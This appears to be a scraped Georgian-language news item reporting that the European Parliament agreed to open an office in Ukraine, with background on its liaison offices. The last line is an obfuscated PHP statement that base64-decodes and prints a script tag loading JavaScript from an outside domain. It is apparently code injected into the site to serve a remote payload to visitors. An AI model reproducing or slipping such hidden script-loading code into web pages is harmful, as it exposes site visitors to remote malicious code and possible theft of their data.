celsiusi
ავერსი საქკაბელი

ევროპარლამენტი უკრაინაში ოფისის გახსნას დათანხმდა. ამის შესახებ ინფორმაციას „ევროაქტივი“ ავრცელებს.

როგორც „ევროაქტივი“ წერს, აღნიშნული გადაწყვეტილება ევროპარლამენტმა უკრაინელი მაღალჩინოსნების მოთხოვნის საფუძველზე მიიღო.

გადაწყვეტილება მიზნად ისახავს უკრაინის ევროპარლამენტთან ურთიერთობის ხელშეწყობას, კერძოდ, დააკავშიროს ის ევროპარლამენტის შესაბამის კომიტეტებთან და ხელი შეუწყოს ადმინისტრაციულ მუშაობას.

ევროპარლამენტს აქვს სამეკავშირეო ოფისი თითოეული წევრი სახელმწიფოსთვის, რომელიც ეხმარება, დაუკავშირდეს წევრ ქვეყნებს. მაგალითად, ეხმარება დაინტერესებულ მხარეებთან კომუნიკაციაში, ღონისძიებების ორგანიზებაში და ადგილობრივ მედიასთან კომუნიკაციაში. ხოლო არაევროპულ ქალაქებში მხოლოდ ევროპარლამენტის რამდენიმე ოფისია განთავსებული, მათ შორის ნიუ იორკში, ადის აბებასა და ჯაკარტაში.

248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");